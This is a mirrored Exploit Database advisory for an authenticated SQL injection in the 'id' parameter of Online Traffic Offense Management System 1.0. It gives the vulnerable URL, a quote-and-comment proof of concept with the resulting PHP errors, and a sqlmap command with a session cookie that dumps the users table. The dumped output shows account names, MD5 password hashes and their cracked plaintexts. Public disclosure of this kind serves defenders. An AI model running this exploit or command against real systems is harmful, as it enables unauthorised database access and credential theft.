Online Traffic Offense Management System 1.0 – ‘id’ SQL Injection (Authenticated)

• Exploit Database
• 14 阅读

• 作者： Justin White
  日期： 2021-08-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50218/

• # Exploit Title: Online Traffic Offense Management System 1.0 - 'id' SQL Injection (Authenticated)
  # Date: 19/08/2021
  # Exploit Author: Justin White
  # Vendor Homepage: https://www.sourcecodester.com
  # Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
  # Version: 1.0
  # Testeted on: Linux (Ubuntu 20.04) using LAMPP
  
  ## SQL Injection
  
  # Vulnerable page
  http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=
  
  #Vulnerable paramater 
  The id paramater is Vulnerable to sqli
  
  #POC
  going to http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4'-- will throw errors on the web page.
  
  Notice: Trying to get property 'num_rows' of non-object in /opt/lampp/htdocs/traffic_offense/admin/drivers/manage_driver.php on line 5
  Notice: Trying to get property 'num_rows' of non-object in /opt/lampp/htdocs/traffic_offense/admin/drivers/manage_driver.php on line 10
  
  Using sqlmap with dump database 
  sqlmap -u "http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4" --cookie="PHPSESSIONID=83ccd78474298cd9c3ad3def1f79f2ac" -D traffic_offense_db -T users --dump
  
  +----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+
  | id | type | avatar| lastname | password| username | firstname| date_added| last_login | date_updated|
  +----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+
  | 1| 1| uploads/1624240500_avatar.png | Admin| 0192023a7bbd73250516f069df18b500 (admin123) | admin| Adminstrator | 2021-01-20 14:02:37 | NULL | 2021-06-21 09:55:07 |
  | 9| 2| uploads/1629336240_avatar.jpg | Smith| 202cb962ac59075b964b07152d234b70 (123)| jsmith1| John | 2021-08-19 09:24:25 | NULL | 2021-08-19 19:14:58 |
  +----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+